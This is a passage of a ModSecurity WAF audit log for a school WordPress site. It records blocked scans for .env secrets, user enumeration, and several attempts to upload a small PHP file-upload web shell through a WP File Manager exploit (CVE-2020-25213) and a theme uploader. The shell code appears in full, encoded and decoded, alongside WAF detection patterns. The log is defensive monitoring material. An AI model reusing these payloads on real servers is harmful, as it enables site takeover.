"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747686414904006 2898 (- - -) Stopwatch2: 1747686414904006 2898; combined=1334, p1=429, p2=870, p3=0, p4=0, p5=35, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5206997f-Z-- --8ebcbf2b-A-- [20/May/2025:03:32:42 +0700] aCuVajuVdcwZ_qZ5ZIo2lQAAAAY 103.236.140.4 39564 103.236.140.4 8181 --8ebcbf2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8ebcbf2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ebcbf2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747686762327538 768 (- - -) Stopwatch2: 1747686762327538 768; combined=332, p1=296, p2=0, p3=0, p4=0, p5=36, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ebcbf2b-Z-- --3e30b954-A-- [20/May/2025:03:32:45 +0700] aCuVbTuVdcwZ_qZ5ZIo2mQAAABE 103.236.140.4 39616 103.236.140.4 8181 --3e30b954-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --3e30b954-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e30b954-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747686765756784 744 (- - -) Stopwatch2: 1747686765756784 744; combined=313, p1=267, p2=0, p3=0, p4=0, p5=46, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e30b954-Z-- --c4a7407f-A-- [20/May/2025:03:42:05 +0700] aCuXnWyGBQNQTJej4E6O1AAAAIs 103.236.140.4 47436 103.236.140.4 8181 --c4a7407f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.29.229.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.29.229.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4a7407f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4a7407f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747687325560596 2708 (- - -) Stopwatch2: 1747687325560596 2708; combined=1234, p1=412, p2=792, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4a7407f-Z-- --f01c9778-A-- [20/May/2025:04:18:43 +0700] aCugM_jdRvl4szSJA_YfHAAAAIk 103.236.140.4 45238 103.236.140.4 8181 --f01c9778-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 Accept-Charset: utf-8 --f01c9778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f01c9778-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747689523503068 787 (- - -) Stopwatch2: 1747689523503068 787; combined=325, p1=286, p2=0, p3=0, p4=0, p5=39, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f01c9778-Z-- --1f06161e-A-- [20/May/2025:04:26:08 +0700] aCuh8PjdRvl4szSJA_YhVwAAAJg 103.236.140.4 58454 103.236.140.4 8181 --1f06161e-B-- GET /wp-content/uploads/mfw-activity-logger/csv-uploads/TitaniumEx.php?Titanium=Ex HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 611 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --1f06161e-C-- =TitaniumExV1.php&=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --1f06161e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f06161e-E-- --1f06161e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747689968648150 2601 (- - -) Stopwatch2: 1747689968648150 2601; combined=793, p1=466, p2=295, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f06161e-Z-- --2bebe029-A-- [20/May/2025:04:26:22 +0700] aCuh_m2BM6ll8T8hTXszNAAAAEc 103.236.140.4 59182 103.236.140.4 8181 --2bebe029-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --2bebe029-C-- Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --2bebe029-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bebe029-E-- --2bebe029-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||smkn22-jkt.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [t Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747689982722911 2530 (- - -) Stopwatch2: 1747689982722911 2530; combined=730, p1=472, p2=229, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bebe029-Z-- --fb1a8253-A-- [20/May/2025:04:26:29 +0700] aCuiBfjdRvl4szSJA_YiHAAAAJg 103.236.140.4 59522 103.236.140.4 8181 --fb1a8253-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=e1545d13e973dd465c1823c143553766 --fb1a8253-C-- --e1545d13e973dd465c1823c143553766 Content-Disposition: form-data; name="cmd" upload --e1545d13e973dd465c1823c143553766 Content-Disposition: form-data; name="target" l1_Lw --e1545d13e973dd465c1823c143553766 Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --e1545d13e973dd465c1823c143553766-- --fb1a8253-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb1a8253-E-- --fb1a8253-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747689989810490 3446 (- - -) Stopwatch2: 1747689989810490 3446; combined=2195, p1=431, p2=1735, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb1a8253-Z-- --0fc9494c-A-- [20/May/2025:04:30:10 +0700] aCui4m2BM6ll8T8hTXs1-QAAAEo 103.236.140.4 39262 103.236.140.4 8181 --0fc9494c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.130.38.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.130.38.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0fc9494c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fc9494c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747690210559205 2715 (- - -) Stopwatch2: 1747690210559205 2715; combined=1441, p1=484, p2=925, p3=0, p4=0, p5=31, sr=126, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fc9494c-Z-- --73234059-A-- [20/May/2025:04:51:23 +0700] aCun2_jdRvl4szSJA_YqyAAAAJE 103.236.140.4 40250 103.236.140.4 8181 --73234059-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.188.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.188.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73234059-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73234059-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747691483446227 3079 (- - -) Stopwatch2: 1747691483446227 3079; combined=1327, p1=420, p2=871, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73234059-Z-- --04da275b-A-- [20/May/2025:05:25:28 +0700] aCuv2G2BM6ll8T8hTXtE_AAAAEk 103.236.140.4 39952 103.236.140.4 8181 --04da275b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.108.227.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.108.227.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04da275b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04da275b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747693528492182 2697 (- - -) Stopwatch2: 1747693528492182 2697; combined=1220, p1=400, p2=793, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04da275b-Z-- --6664794a-A-- [20/May/2025:06:23:18 +0700] aCu9ZvjdRvl4szSJA_Y8XQAAAIE 103.236.140.4 59420 103.236.140.4 8181 --6664794a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6664794a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6664794a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747696998871634 800 (- - -) Stopwatch2: 1747696998871634 800; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6664794a-Z-- --da8d3542-A-- [20/May/2025:06:23:22 +0700] aCu9asXP1sKBAOnOfYPsZgAAAM8 103.236.140.4 59492 103.236.140.4 8181 --da8d3542-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --da8d3542-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da8d3542-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747697002645562 794 (- - -) Stopwatch2: 1747697002645562 794; combined=354, p1=317, p2=0, p3=0, p4=0, p5=36, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da8d3542-Z-- --0a56a42f-A-- [20/May/2025:06:35:19 +0700] aCvAN4Kffmi-VC_l8kQfFgAAAAU 103.236.140.4 42882 103.236.140.4 8181 --0a56a42f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.44.117.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.44.117.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0a56a42f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a56a42f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747697719948076 6130 (- - -) Stopwatch2: 1747697719948076 6130; combined=4165, p1=1094, p2=3039, p3=0, p4=0, p5=32, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a56a42f-Z-- --2bfe406f-A-- [20/May/2025:06:59:46 +0700] aCvF8sXP1sKBAOnOfYP06QAAAMc 103.236.140.4 40218 103.236.140.4 8181 --2bfe406f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.75.37.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.75.37.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2bfe406f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bfe406f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747699186481153 4018 (- - -) Stopwatch2: 1747699186481153 4018; combined=1994, p1=589, p2=1372, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bfe406f-Z-- --2b36b67e-A-- [20/May/2025:07:17:47 +0700] aCvKK4Kffmi-VC_l8kQqzgAAABY 103.236.140.4 60102 103.236.140.4 8181 --2b36b67e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.41.83.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.41.83.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2b36b67e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b36b67e-H-- Message: 